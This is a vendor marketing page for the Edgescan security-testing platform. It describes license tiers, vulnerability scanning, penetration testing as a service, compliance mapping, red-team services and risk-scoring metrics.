# Edgescan Cybersecurity Platform

### Edgescan Platform Licenses

Licenses for Edgescan solutions: the platform that gives you continuous security testing, validated risk and proven exploits to improve your exposure management program.

#### Edgescan Essentials (Unauthenticated DAST)

Designed for scalable security coverage, Essentials gives you a clear picture of your external risk posture without the noise.

- 100% validated vulnerability results, no false positives
- Includes Network Vulnerability Management (NVM) for host-level visibility
- Unlimited automated DAST assessments
- Continuous API discovery
- Reporting tailored by audience or schedule
- Access to Edgescan's AI Insights for real-time remediation guidance
- Integrates easily with third-party systems and developer workflows
- Risk-based prioritization using CVSS, Edgescan Validated Security Score (EVSS), and Exposure Factor (EXF)

#### Edgescan Professional (Authenticated DAST)

Edgescan Professional expands on the Essentials tier with authenticated DAST capabilities, allowing deeper testing of session-aware, user-specific, and API-driven environments. It delivers comprehensive visibility across your dynamic applications, validated results, and prioritized remediation guidance, all via the Edgescan Platform.

All features from the Essentials License, plus:

- Authenticated Dynamic Application Security Testing (DAST)
- Deeper testing coverage for applications behind login or session layers

#### Edgescan Advanced (PTaaS)

Edgescan's Advanced/PTaaS License delivers deep, human-led assessments of your most complex applications, focusing on business logic flaws, authenticated attack vectors, and advanced threats that automation alone cannot detect. Vulnerabilities are prioritized with risk-based scoring and mapped to actionable remediation guidance, all delivered through the Edgescan Platform for continuous visibility, unlimited retesting, and enterprise-scale coverage.

Includes all capabilities from the Professional License, plus enhanced manual testing and expert validation:

- Authenticated application penetration testing (PTaaS), including business logic assessments (BLA)
- Manual testing performed by full-time Edgescan security experts (OSCP, CREST-certified)
- API discovery and coverage across web apps, APIs, network infrastructure, and cloud environments
- Integration with third-party tools, threat intelligence feeds (CISA KEV, EPSS), and AI-powered remediation insights
- Tailored reporting by audience or schedule
- Unlimited retesting on demand

#### Edgescan Host/Server (Network Vulnerability Management)

Edgescan's Host/Server NVM License delivers continuous, accurate vulnerability assessment across your internal and external infrastructure. Combining automated scanning with expert validation, the platform helps teams detect, prioritize, and remediate real risks, minimizing false positives and accelerating time-to-fix.

- Continuous vulnerability scanning across internal networks, servers, and infrastructure
- 100% validated results, no false positives
- Detection of missing patches, misconfigurations, and known CVEs (per NIST NVD)
- API discovery and VoIP/infrastructure scanning across diverse environments
- Risk-based prioritization using CVSS, EVSS, and EXF scoring
- Retesting on demand and customizable stakeholder reporting
- Seamless integrations with third-party tools via API
- Option to upgrade to the Edgescan Advanced/PTaaS License for deeper manual testing
- Supported by CREST-certified experts with real-time AI-driven remediation insights

#### Mobile Application Security Testing (MAST)

Edgescan MAST delivers comprehensive security testing for mobile applications by combining native device testing, forensic analysis, and API-level penetration testing, all performed by CREST- and OSCP-certified experts. Designed to secure both the application and its backend infrastructure, this service provides validated results, continuous risk context, and unlimited retesting via the Edgescan Platform.

- Native mobile app testing for iOS and Android devices
- Forensic analysis of mobile device behavior and vulnerabilities
- Manual penetration testing of the mobile application's backend API (Advanced license included)
- Includes unlimited DAST assessments and Network Vulnerability Management (NVM) for API and hosting infrastructure
- Continuous API discovery and threat feed enrichment (CISA KEV, EPSS)
- 100% validated results with risk-based scoring (CVSS, EVSS, EXF)
- Unlimited retesting and customizable stakeholder reporting
- Seamless integrations via API and third-party system support
- Delivered by full-time certified security professionals

#### All core licenses include

- 100% vulnerability validation, no false positives
- Unlimited automated assessments (network scans and DAST for applications and/or APIs)
- Unlimited retesting of vulnerabilities
- Expert remediation guidance
- Premium support from full-time (OSCP/CREST) security experts
- Prebuilt and custom RESTful API integrations
- Unlimited role-based user accounts
- Unlimited, on-demand, customized reporting
- CISA KEV and EPSS correlation of applicable vulnerabilities

#### Additional Services and Add-ons

- Attack Surface Management (ASM): Discovery of all internet-facing assets associated with a domain, and continuous monitoring of defined external IP range(s). Internet discovery for a primary domain includes, but is not limited to, subdomains, internet records, registrants, and services. The service continuously assesses and alerts users about network changes and APIs discovered in their defined external attack surface.
- PCI ASV (Payment Card Industry Approved Scanning Vendor service): Approved Scanning Vendor service to satisfy PCI DSS compliance needs pertaining to vulnerability scanning, penetration testing, and reporting.
- 24x7x365 Support: If access to 24/7 emergency escalations or premium support is required outside of traditional business hours, Edgescan can accommodate.
- Technical Account Manager (TAM): A dedicated account concierge who assists in achieving operational readiness across the enterprise. Edgescan is easy to set up and maintain out of the box; however, a Technical Account Manager is often recommended for teams that need to improve their security posture quickly, are going through a digital transformation effort, are short-staffed, or have particularly complex environments.

All Edgescan licenses include continuous vulnerability assessment with unlimited automated scans, risk prioritization, validated results, access to our analytics dashboard, and remediation guidance. Manual penetration testing, mobile application assessments, and authenticated testing can be added based on your risk tolerance and compliance needs. Pricing adjusts with the scope of coverage (applications, APIs, and IPs) and the level of testing rigor required. Volume discounts and multi-year pricing options are available. For a tailored quote or to explore the right configuration for your organization, please contact our team.

#### Types of Assets Discovered and Protected by the Edgescan Platform

Application examples: web applications (authenticated and unauthenticated), APIs (JSON, XML, WSDL, YAML and GraphQL), microservice architectures, single-page applications, mobile applications.

Network asset examples: servers, routers, switches, firewalls, domain controllers, data centers, desktops (any layer 2 and layer 3 devices), printers, cloud assets, container hostnames, IoT, and anything that has an IP address visible to Edgescan. Single IPs, hostnames, blocks, CIDR ranges and IPv6 are all supported.

#### Integrations

All tiers of Edgescan come with our full suite of integrations.

#### Contextualized Risk Scoring

Risk prioritization with traditional scoring systems (CVSS, EPSS, CISA KEV) and proprietary ones (EVSS, EXF).

#### Certified Security Professionals

Edgescan security experts (OSCP/CREST) are full-time employees able to provide consultancy-grade penetration tests and Business Logic Assessments (BLAs) as PTaaS to critical assets.

#### Vulnerabilities Discovered by Edgescan

Our hybrid process of advanced scanning automation and cyber analytics combined with human intelligence is what differentiates us from scanning tools and traditional penetration testing services. Vulnerability classes covered include:

- All OWASP Top 10 vulnerabilities
- Application framework known vulnerabilities (Spring, Struts, Zend, Django, .NET, etc.)
- Autocomplete attribute
- Buffer overflow
- Content spoofing (HTML injection)
- Cookie access control
- Cross-site scripting (XSS), reflected and stored
- Data / information leakage
- Directory indexing
- DOM XSS
- File path traversal
- HTTP caching control
- HTTP header injection
- HttpOnly session cookie flag
- HTTP response smuggling
- HTTP response splitting / pollution
- Improper input handling
- Improper output encoding / content type encoding
- Improper file system access control
- Insufficient SSL / TLS / transport layer protection
- Integer overflows
- LDAP injection
- OS command injection
- Persistent session cookie
- Remote file inclusion (RFI)
- SANS Top 25 software errors
- Server-side injection
- SQL injection: error-based, time-based and Boolean-conditional, against MySQL, MSSQL, Oracle, etc.
- Unsecured session cookie
- URL redirect security
- XML attribute security, XML external entities (XXE)
- XML injection and schema security
- XPath injection

### DevSecOps

With the pace of today's development cycles, it's imperative to build security into your stack from the ground up.
Edgescan integrates with all major CI/CD pipelines while producing validated vulnerability intelligence that is virtually free of false positives. With a unified approach that fosters cross-functional collaboration, and threat intelligence that is straightforward and accessible, teams across your organization stay on the same page as they work together to maintain a robust security posture in a constantly evolving threat environment.

#### Safe Sprinting

The days are long gone when an organization's security team could get involved at the end of a development cycle. The modern sprint model requires that teams incorporate security into the process from day one. The goal for any organization is to operate at speed and scale without sacrificing security. That is next to impossible without highly accurate and timely security assessments, which is a fair summary of what Edgescan is all about. With continuous vulnerability scanning and penetration testing, the Edgescan platform powers a unified approach to vulnerability management that creates a single source of truth across your development and security teams.

#### Validation, Validation, Validation

Edgescan ensures vulnerabilities presented in the platform are real through a combination of auto-validation, based on data science, and expert validation where required. For vulnerabilities that can't be auto-validated (about 8%), our experts triage and confirm that the discovered vulnerability is truly real. The solution is powered by analytics drawing on millions of past vulnerability examples from the Edgescan data lake. Potential findings are assessed against this body of intelligence, gathered across a decade of service to a wide variety of clients, to root out false positives immediately. That is only the first phase of a multi-step validation process. Flagged vulnerabilities deemed to require additional inspection are placed into the expert validation pipeline, where Edgescan's OSCP- and CREST-certified experts (seasoned penetration testers who have been with the firm an average of seven years) probe them to verify the finding and map its characteristics.

With the breadth of automation and the depth of human expertise, you can have confidence that your assessments are both comprehensive and free of false positives. Your security team won't waste time on issues that pose no real danger, and your development team won't be handed a list of unimportant issues to address while building out a new layer of the stack. They can fix significant problems fast and keep moving.

#### Complete Integration

The Edgescan API integrates with all major CI/CD pipelines, so the security team can feed information straight into an interface shared with developers. Multiple working groups in the DevSecOps equation then look at the same intelligence and the same data; they are on the same page. They can alert one another within the platform and push issues as priorities for review or remediation. The solution assesses new and existing code on a schedule matched to the development team's sprint cycles, and the output reports are shared with the team so remediation can begin while development continues. That is development at speed and scale, without sacrificing security. That is DevSecOps.

#### Build a Holistic Model

DevSecOps is an ethos for an entire organization, one that encourages members of every team to approach their work with information security in mind. It is a collaborative view of security across the board, where everyone is responsible for maintaining a robust security posture. Vital to this mission is intelligence that is accessible to all team members, regardless of their specialization or level of expertise. At Edgescan, we believe full-stack vulnerability intelligence should be expressed in plain language that everyone can understand, and the platform combines multiple views of the same problem to create a true DevSecOps framework.

#### Continuous Support

If you have questions about a vulnerability identified on an assessment, our team of seasoned penetration testers is on hand to provide technical background and guide your remediation process to ensure a security gap is fully closed. Our experts are also available to help you design your DevSecOps strategy from a global perspective to maximize the efficiency and resiliency of your process, and to help different teams with different views of the same problem understand the issue in their own terms. Whether you know what's missing from your organization's approach to secure development or you're still figuring that out, Edgescan is not just a tool: it is a platform and a service that changes the shape of your organization's approach through ongoing partnership.

### Mergers and Acquisitions

When a firm's strategy rests on acquiring other enterprises, and their digital assets, it is crucial to develop a strategic process for safely welcoming those assets and data into the cyber estate following a transaction.
Edgescan will partner with your security team to build and execute that process.

#### Build Your Fortress

No matter your business strategy, the first step for any organization, large or small, is to establish a robust security posture across your current digital estate. The Edgescan platform is purpose-built to provide your internal security team with a comprehensive view of the attack surface, identify and flag vulnerabilities, and guide your team through the remediation process with validated, risk-rated vulnerability assessments, so your team can tackle the most pressing issues first.

#### The Acquisition Challenge

Mergers and acquisitions present continuous challenges for a firm's internal security team. "Cybersecurity concerns are high for all M&A transactions, especially in due diligence," Gartner reports. "The implications of incomplete or inaccurate due diligence can be catastrophic." How can your security team get a comprehensive view of the IT assets associated with an outside enterprise, particularly if it does not get the opportunity to perform full due diligence before acquisition? With a limited time window before new assets must be assimilated into the cyber estate, it is not always realistic to identify and profile all of the disparate assets to get visibility into their risk controls. That is where Edgescan comes in.

#### Secure Growth

Once a fortified perimeter is established around your existing digital infrastructure, Edgescan will be your partner in safely welcoming new assets into the fold. When an Edgescan client moves to make an acquisition, the platform onboards the assets associated with the target company (websites, mobile applications, network infrastructure, and more) and begins a program of continuous Attack Surface Management (ASM) to discover and profile new assets before they enter the network. The acquired landscape, assets, and systems are scrutinized for vulnerabilities as they are accepted into the acquiring firm's cyber estate, in order to maintain the client's overall security posture.

#### Validated Vulnerabilities

Every potential vulnerability flagged in the Edgescan dashboard is automatically assessed and validated using the platform's data lake. When required, discovered exposures are validated by a team of CREST- and OSCP-certified analysts, creating a multi-step validation process that virtually guarantees your vulnerability assessment results will be free of false positives.

#### End-to-End Integration

With the Edgescan dashboard, the assessment process for new assets can be streamlined and automated into your existing security procedures. Your catalog of vulnerabilities, recommendations for how to fix them, and guidance on what should be a priority will be continually updated to offer a comprehensive view of your organization's attack surface as it grows and evolves.

#### World-Class Support

The same team of experts who validate your vulnerabilities are also on hand (and on demand) whenever you contact Edgescan support, to offer further insight on your security gaps and advise you on how to close them. They can guide your decision-making and help you design a consistent process for discovering, profiling, and accepting new assets into your digital estate following an acquisition.

#### Strength Through Consistency

That process is key: a defined and standardized procedure, repeatable and reliable in a wide variety of business contexts, is essential to growing safely. For enterprises specializing in mergers and acquisitions, penetration testing every application, API, and piece of network infrastructure following an acquisition is next to impossible, and the sheer scale of the task can be daunting for teams with finite resources and limited specialization. Partnering with Edgescan directly serves the major strategic goals of your business and allows leadership to execute a plan at the global level while the security team maintains full command of the security posture across the attack surface. Elevate new assets to meet your security standards and grow with strength in a competitive landscape.

### Compliance

DORA, PCI DSS, CISA, CIS, PSD2, SOC, ISO, NIST, and the FTC's Safeguards Rule

The Edgescan platform is purpose-built to bring your organization into alignment with the industry and government regulatory standards that apply to it, and then to exceed them. "As more nations enforce privacy and data protection and localization requirements," Gartner reports, "forward-thinking organizations must rethink their compliance processes" to reflect new privacy and data-protection benchmarks. Edgescan provides PCI DSS, CISA and CIS compliance mapping, and the platform's AI Insights feature maps discovered vulnerabilities to compliance standards in order to frame how each vulnerability will affect compliance efforts.
When you achieve a comprehensive view of the attack surface and continually identify vulnerabilities with Edgescan before they are exploited by malign actors, you build a security posture where compliance is just the baseline.

#### PCI-Approved

The Payment Card Industry Security Standards Council (PCI SSC) designates Approved Scanning Vendors (ASVs) that are qualified to conduct external vulnerability scanning for firms that process card payments online. Quarterly external ASV scanning is the core requirement, but PCI DSS has grown in recent years to also require an annual penetration test and rescanning to verify remediation. The Edgescan platform will equip your internal security team to tackle all provisions of the PCI DSS standard.

#### Exceed E.U. Standards

The European Union has issued a set of rules for firms processing online payments known as the revised Payment Services Directive (PSD2), an update to the original directive adopted in 2007. PSD2 is backed by regulatory technical standards that require firms to implement strong customer authentication, and it also sets guidelines for incident reporting and full and proper remediation.

The Digital Operational Resilience Act (DORA) is the new standard for information security among European financial institutions, particularly those regulated by central banks, and introduces rules around incident management and reporting, digital testing, and management of third-party risk. It also applies to third-party vendors providing Information and Communications Technology (ICT) services to financial institutions, including cloud platforms or data analytics. Financial entities are required to define, document, and maintain a comprehensive digital operational resilience testing program that includes vulnerability scanning and penetration tests. With continuous vulnerability scanning, regular penetration testing, and remediation guidance, the Edgescan platform is built to partner with your security team as they clear all applicable European standards.

#### FTC-Ready

In the United States, the FTC's Standards for Safeguarding Customer Information (the Safeguards Rule) applies to financial institutions like "mortgage lenders, payday lenders, finance companies, mortgage brokers, account servicers, check cashers, wire transferors, collection agencies, credit counselors and other financial advisors, tax preparation firms, non-federally insured credit unions, and [some] investment advisors." These organizations are required to develop, implement, and maintain an information security program that adequately protects customers' personal and financial information. The Edgescan platform is well placed to serve your team as they drive your organization to meet and exceed FTC standards.

#### Next-Level Data Security

The System and Organization Controls (SOC) 2 framework evaluates how organizations manage their systems and customer data. It is designed with cloud providers and software-as-a-service (SaaS) vendors in mind, and it is based on five Trust Services Criteria: security, availability, processing integrity, confidentiality, and privacy. Edgescan will partner with your security team to develop a data-security program that exceeds SOC 2 expectations, and the platform will identify security gaps where unauthorized access could lead to data leaks, compromised information, and bad headlines.

#### See the Full Threat Matrix

You can tap the Edgescan platform to aid your security team in meeting ISO/IEC 27001 and 27002 guidelines by developing information-security controls with a healthy focus on how they fit within the overall risk environment. What are the patterns of attack currently favored by bad actors targeting other firms in your industry? Are they zeroing in on rogue APIs, or some other region of the attack surface? And what are the most up-to-date methods to counter your adversaries in the constantly evolving cyber arms race? Edgescan will provide you with current intelligence to answer these questions so you clear ISO guidelines with room to spare.

#### Validated Vulnerabilities

Every vulnerability flagged in the Edgescan dashboard has been automatically assessed and validated against the platform's data lake using data science. When automation is not rigorous enough, complex vulnerabilities, exposures and threats are validated by a team of CREST- and OSCP-certified penetration testers who have been with the firm an average of seven years, creating a multi-step validation process that virtually guarantees a list of vulnerabilities that is free of false positives. Don't waste time investigating bogus findings that pose no threat to your systems and will not affect your compliance goals. When you see it in Edgescan, you know it is real.

### Continuous Threat Exposure Management (CTEM)

Edgescan was delivering Continuous Threat Exposure Management for years before Gartner coined the term in 2022.
Vulnerability detection, validation, and prioritization, plus Penetration Testing as a Service (PTaaS) and Attack Surface Management (ASM): Edgescan has been in the business of CTEM since before CTEM had a name. Scope your exposure and improve your security posture with a continuous, adaptable, and cost-effective solution that covers a broad range of networks, endpoints, and cloud environments across your organization's security landscape. That is how you stay secure as the threat matrix evolves and your web-facing infrastructure grows: by continuously monitoring, assessing, prioritizing, and resolving security issues on a platform that powers an integrated and holistic approach to vulnerability management.

#### Constant Vigilance, No Surprises

Edgescan delivers continuous monitoring and real-time intelligence to security teams at some of the largest companies in the world, helping them map their attack surfaces, identify vulnerabilities, validate those findings and root out false positives. The Edgescan platform is also built to guide and track the remediation process and ensure security gaps are truly closed. This is continuous vulnerability management at the highest level, and with a human element: Edgescan's team of CREST- and OSCP-certified experts not only conducts hundreds of pentests and thousands of assessments per month, they are also on hand to answer questions and guide your remediation process any time you call the support desk. This isn't a tool, it's a service, and it's always on. You won't be caught off guard by an unexpected vulnerability that pops up on an annual pentest, because you will catch vulnerabilities and fix them well before then. That is how you develop a security posture in which serious threats are continuously addressed before they are exploited by malign actors. Industry analysts have reported that organizations using CTEM see a 30% drop in cyber incidents.

#### Reduce Your Mean Time to Remediate (MTTR)

If you operate on an annual pentest model, you are not on a level playing field with threat agents and cyber criminals. It is a point-in-time assessment, and as the landscape changes, your window of exposure grows. With CTEM, you are continuously served in-depth intelligence on what and where your vulnerabilities are and how to fix them. All discovered threats and exposures are risk-rated and prioritized in the Edgescan dashboard so your security team can understand the risks and address the most pressing issues first, before they become a problem for your organization. With comprehensive vision across the attack surface and clear guidance on how to address vulnerabilities as they are identified, Edgescan clients have seen a reduction in remediation time of up to 55%.

#### Adaptable and Dynamic Threat Detection

Annual penetration testing provides a snapshot of your network infrastructure (and the vulnerabilities lurking therein) that is accurate at the time, but static. Today's threat matrix is constantly evolving. Malign actors escalate and adapt their methods while your organization continually grows its digital assets as the enterprise evolves. Change gives rise to risk: as the landscape changes, threats evolve. CTEM is designed to help you stay two steps ahead. With CTEM, you are constantly mapping and re-mapping the ever-changing landscape. It is like a GPS, and with validation and prioritization it is always pointing you towards the most efficient route to your destination: a robust security posture that turns your organization's digital estate into a fortress.

#### Reduce Costs and Consolidate Your Budgets

In a vacuum, it might seem cost-effective to put your resources towards testing on an annual basis, or whatever is required by the regulatory framework in your space. But ultimately this kind of reactive model can prove more resource-intensive than a CTEM model where you constantly monitor the attack surface and close security gaps as they open up. Continuous vulnerability management is keeping your house clean rather than waiting until things get bad to clean it all up, and it saves money. Some enterprises have reduced their overall security costs by up to 50% by implementing CTEM, all while dramatically improving their security postures.

### Application Security Posture Management (ASPM)

The security of web-facing and internal applications is a core priority for any organization. The Edgescan platform performs continuous vulnerability assessments of applications throughout the software development lifecycle, validating potential vulnerabilities to eliminate false positives and guiding the remediation process. Edgescan partners with security teams at both SMBs and some of the largest companies in the world to monitor applications across their digital estates according to the core principles of Application Security Posture Management (ASPM). Leveraging AI ("AI Insights") to map your exposures and align your posture to compliance standards, ransomware resilience, preventative security, and training, based on real-time analysis of your vulnerability data, provides a compelling security posture management solution.

#### Get a comprehensive view of the attack surface

Any ASPM service should offer an organization's security team up-to-date intelligence on the number and severity of vulnerabilities. The Edgescan platform rises above that baseline with continuous vulnerability assessments that combine the breadth of automation and data science with the depth of human expertise. Every vulnerability identified on an Edgescan assessment is automatically evaluated against a vast data lake to assess whether it poses a real and pressing threat to your organization.
If required, depending on the exposure type, a team of OSCP- and CREST-certified experts (seasoned penetration testers who have been with Edgescan an average of seven years) gets involved, creating a multi-step validation process for a solution that is virtually free of false positives. Edgescan offers your security team detailed guidance on how to approach the remediation process for a particular vulnerability, and those same penetration testers are on hand when you contact support to offer insight and recommendations to inform your approach. Our AI Insights feature also maps vulnerabilities against a variety of compliance standards, flags ransomware exploitation risks, highlights exposure anomalies, and suggests focus areas for training and preventative security.

#### Know your priorities

The first question is, "What do I fix?" The next is, "What do I fix first?" The catalog of validated vulnerabilities continually delivered to your security team is risk-rated, with a range of metrics indicating the threats that should be top priorities for remediation. Edgescan provides a number of risk signals (EPSS, CISA KEV, CVSS, and the proprietary EXF) so your internal team can make efficient decisions to quickly and dramatically improve your risk profile.

#### Secure from the ground up

The days are long gone when an organization's security team could get involved at the end of a development cycle. The contemporary sprint model demands a comprehensive and continuous vulnerability management approach, one that teams can incorporate into their Software Development Life Cycle (SDLC) from day one. Edgescan integrates with all major CI/CD, ticketing and vulnerability management platforms and pipelines, so the security team can feed information straight into an interface shared with developers. The goal for any organization is to operate at speed and scale without sacrificing safety and security, and Edgescan is designed to help build security into your development process through DevSecOps.

#### Eliminate the threat, fast

A priority metric for any security team is mean time to remediation (MTTR), which gauges how long it takes to address vulnerabilities. It is core to the firm's security posture: you find potential threats in order to close gaps in your armor that can be exploited by malign actors. With the Edgescan platform's validated and prioritized vulnerabilities, you aren't wasting time on false positives. The solution points you towards the areas of priority, compliance issues and even training requirements using our AI Insights feature. You get all the intelligence you need in one interface.

#### Meet and exceed compliance

Your first duty as a member of the cybersecurity team is to meet the compliance standards in your industry or space. Whether it is PCI DSS, CISA, CIS, SOC, ISO, or the European Union's Payment Services Directive (PSD2), the Edgescan platform gives you the tools to bring your security posture in line with these standards and exceed them with Attack Surface Management (ASM) and Penetration Testing as a Service (PTaaS). The Edgescan dashboard advises you on your progress against key metrics, mapping discovered vulnerabilities to compliance standards through our AI-based advisory, which performs ongoing analysis of your security posture. You can rely on continually updating metrics and intelligence to monitor each application's overall security posture and whether it meets the standards of your regulatory framework.
### DORA / Red-Teaming

In the European Union, the Digital Operational Resilience Act (DORA) is the new standard for information security among financial institutions and introduces rules around incident management and reporting, digital testing, and management of third-party risk.

With the Edgescan Red Team service, a specialized group of certified security professionals will help bring your firm in compliance with DORA (and other aligning standards like TIBER-EU) by emulating adversarial tactics to identify, exploit, and report vulnerabilities in your systems.

Red Teaming is typically combined with the continuous testing and exposure management approach Edgescan traditionally delivers to provide both deep threat-based assessments and validated full-stack assessments on demand.

#### What is DORA?

From January 2025, the Digital Operational Resilience Act (DORA) governs information security for financial institutions that do business in the European Union, particularly those regulated by central banks. That includes commercial banks, insurance companies, investment firms, and more. DORA ensures that the E.U. financial sector can withstand, respond to, and recover from Information and Communications Technology (ICT)-related disruptions and cyberattacks. New rules around incident management and reporting, digital testing, and management of third-party risk are designed to guide financial firms in building robust security postures in the face of a threat matrix that’s constantly evolving. The requirements also apply to third-party vendors providing ICT services to financial institutions, including cloud platforms or data analytics. Financial entities and their vendors are required to define, document, and maintain a comprehensive digital operational resilience testing program that includes vulnerability scanning and penetration tests, plus Red-Teaming and Threat-Led Penetration Testing (TLPT).

#### The Red Team

With Edgescan, your internal security team can partner with a specialized group of security professionals who hold a range of certifications through leading organizations such as Offensive Security, CREST, Altered Security, EC-Council and more, ensuring the highest level of expertise and professionalism in every engagement. These experts are trained in adversarial Tactics, Techniques, and Procedures (TTPs) to identify and exploit vulnerabilities, alerting Edgescan clients to potential vulnerabilities in their systems by simulating real-world cyber attacks. The Edgescan Red Team might use social engineering tactics to assess employee security awareness, conduct wireless assessments to evaluate network vulnerabilities, or attempt to infiltrate the environment, navigate through systems, escalate access, and simulate the potential impact of a real-world attack on your organization. This approach aligns with Threat-Led Penetration Testing (TLPT), ensuring that testing scenarios reflect realistic threats and tactics used by adversaries.

#### Red-Teaming: How it Works

The Edgescan Difference

Edgescan’s Red Teams will engage your security systems over an extended timespan, looking at all available means to breach and exploit.

They’ll go well beyond the commercial, open-source, and proprietary scanning tools that form the basis of many vulnerability assessments, enlisting a varied arsenal of assessments to test the mettle of your security team and the posture they’ve built to safeguard your customers’ data and sensitive information.

Your staff won’t be aware of when and where a simulated attack will take place, adding an extra layer of realism. All your systems will be tested together, and the focus area will be fluid, dynamic, and wide-ranging.

This comprehensive approach will also satisfy Threat Intelligence-based Ethical Red Teaming (TIBER-EU) requirements, which align with DORA. Using threat intelligence to tailor testing, Edgescan’s ethical Red Teams can gauge the specific risk profile of your organization and mimic adversarial tactics to put your systems to the test.

### Seamless Integrations

Seamlessly integrate alerts and notifications with your installed third-party systems for complete visibility across your tool stack.

#### Integrate Your Core Solutions

Businesses today depend on a range of different solutions to coordinate their operations within individual units or across their organization—tools for communication, workflow, asset management, webhooks, and more. Edgescan’s continuous security testing and exposure management SaaS platform seamlessly integrates into your operational ecosystem, working in harmony with leading technology solutions using an API-first approach that will enhance your overall security posture while safely enabling your existing continuous integration (CI), continuous delivery (CD), and DevOps tools. Here are some major solutions that the Edgescan platform will enable you to operate without endangering your attack surface or your operational efficiency:

#### Full visibility across your public cloud

The Cloudhook integration automatically onboards locations present in various cloud environments into the Edgescan platform, giving full visibility across your public cloud.

### Support

End-to-End Support

From activation to validation to remediation and beyond, our team of CREST- and OSCP-certified experts will partner with your internal security staff to strengthen your security posture across the full stack.
#### Activation

When you enlist Edgescan’s continuous security testing and exposure management SaaS platform, a member of our team will organize a training for you and your staff to familiarize you with the platform’s offerings as well as the new base of operations for your internal security team: the Edgescan dashboard.

This will typically mean a 30-minute hands-on session to get you familiar with the platform and its capabilities: scanning and penetration testing to identify vulnerabilities, plus validation, remediation, and verification to ensure they’ve been resolved.

#### Trusted Validation

All vulnerabilities identified during an Edgescan assessment are automatically validated against the vast trove of insights in the Edgescan data lake.

But when a flagged vulnerability is unfit for automatic validation, it’s placed into the expert validation process. Complex vulnerabilities, less-common issues, and those of potentially major severity will generally undergo expert validation.

Edgescan experts are seasoned penetration testers who deliver pentesting fieldwork and Penetration Testing as a Service (PTaaS) on a daily basis. They are OSCP- and CREST-certified, and use both widely available techniques and others proprietary to Edgescan to probe your web-facing applications, APIs, host network, and more. This second layer of confirmation results in highly accurate vulnerability intelligence, and you can have absolute confidence that your vulnerability assessments will be both comprehensive and false-positive-free.

But you can also contact Edgescan at any time and ask to speak with a dedicated penetration tester about a specific vulnerability around which you have outstanding questions, to explore patterns in your vulnerability data, or to understand how a particular security gap fits in the context of your overall network and web-facing architecture.

#### Guided Remediation

Once your list of validated vulnerabilities is compiled in the Edgescan dashboard, they’ll be laid out against a number of different metrics that you can use to prioritize them for assignment and remediation, beginning with the most critical threats. This risk-rated approach will help you save time and money while delivering high-impact results that significantly elevate your security posture.

But the Edgescan support team will also be with you all along the way, on call to offer human expertise on your remediation process that will buttress the sprawling data-powered insights of the Edgescan dashboard. If you’ve got a question on the threat level of a specific vulnerability, or how it relates to the others you’re targeting, you can ask a certified pentester to break things down for your team.

Once an identified vulnerability has cleared your remediation pipeline, you can mark it as addressed in the Edgescan dashboard by initiating a retest, at which point our experts will circle back around to verify the security gap has been fully resolved and no longer poses a significant problem for your organization.

#### Problem-Focused Training

In addition to the training your team will receive during onboarding, established clients can contact their Edgescan Customer Success Manager (CSM) at any time to organize further primers on using the tools and services on offer to maximize the impact of the Edgescan platform on their information-security approach. In this context, sessions are typically problem-based rather than high-level overviews, designed to address specific shortfalls in understanding and implementation at one or more stages of the vulnerability-management process. No matter the mission, the expert support team at Edgescan is on hand to ensure you are fully enabled on the platform and best equipped to strengthen your security posture in every dimension across the full stack.

### Risk Rating

Risk Rated

Let’s secure what matters, starting with what matters most. This is prioritized threat intelligence with a human touch.

#### What Do I Fix?

With Edgescan’s hybrid validation approach, you’ll get a list of vulnerabilities across your full stack that’s virtually free of false positives every single time.

That’s efficiency: unlike scanners or other tools, our continuous security testing and unified exposure management SaaS platform won’t serve up an index of 1,100 potential vulnerabilities and leave you to figure out what’s what.
You’ll get all the verified, active threats and nothing more.

#### When Do I Fix It?

But even once the real problems are separated from the rest—the signal in the noise—there’s a next question: “What should I fix first?”

The answer will yield huge dividends for your information-security team and your business as a whole if you can find it quickly and consistently. With the right information about which threats to prioritize, you can dramatically improve the efficiency of your remediation process, delivering value back to your business in the form of time and money while strengthening your security posture.

Edgescan consistently delivers those answers to organizations large and small with data-powered tool sets backed by the human element: on-demand support from CREST- and OSCP-certified experts.

#### Risk-Rating From Every Angle

Once vulnerabilities are assessed across your web-facing assets, a list of them will be compiled in the Edgescan dashboard. That’s also where you’ll find an all-you-can-eat buffet of risk-prioritization tools to guide you through your remediation process:

There’s the Common Vulnerability Scoring System (CVSS), the generalized scoring system which any vulnerability-management tool would need to provide.

There’s the Cybersecurity & Infrastructure Security Agency’s Known Exploited Vulnerabilities catalog (CISA KEV), which speaks to whether the particular vulnerability in question has been exploited somewhere out in the wild today. This catalog is constantly updated via API to pipe new known-exploited issues into the Edgescan dashboard as they’re identified.

There’s the Exploit Prediction Scoring System (EPSS), which tells you how likely it is that a specific vulnerability will be exploited based on the prevailing trends and current landscape.

And then there are Edgescan’s proprietary tools, including the Edgescan Validated Security Score (EVSS), which serves up a bespoke score for each client that takes into account everything we know about their organization. That includes the systems architecture, how many layers of the stack we’re testing for them, any context around their network vulnerabilities that affects their application vulnerabilities, and which—if any—compensating controls they have in place. The internal security team can risk-accept vulnerabilities one by one and let us know why they made each decision. In the end, you’re left with a score customized to your organization, from critical all the way down to minimal.

But then there’s the ultimate metric for your risk-rating process: the Edgescan eXposure Factor (EXF).

#### The EXF Difference

What if you could combine all of the resources above to dynamically generate breach probability data in the aggregate?

The Edgescan eXposure Factor does just that, combining metadata from CVSS, EPSS, and CISA KEV to assess each discovered and validated vulnerability on a 0 to 100 scale, where a lower score indicates minimal risk and a higher one signifies greater vulnerability. It’s a single unified metric to gauge the degree of exposure and how menacing it may be in the context of your overall security posture.

The Edgescan eXposure Factor is displayed to the user on the Vulnerabilities page of the Edgescan dashboard under the title EXF. It’s recalibrated daily via dynamic feeds from all the constituent sources to keep pace with exploitation intelligence in the wild and incorporate changes to your organization, your network, and your overall security posture.

#### The Human Element

The range of tools included in the Edgescan platform will deliver context around your vulnerabilities using vast data resources and proprietary analytical techniques.

But the real power of Edgescan lies in backing all this mechanical might with the dexterity and depth of human intelligence. If you’re looking for further insight into a particular vulnerability, the Edgescan support team is on call to provide a guiding hand when making your remediation priority decisions.

These CREST- and OSCP-certified experts are full-time Edgescan employees who’ve been with the firm an average of seven years, and you can request to speak with a licensed penetration tester at any time.

This bespoke service enables us to meet our ultimate goal: to fit into and enhance your security program as it stands.

#### Small Org. Big Org.

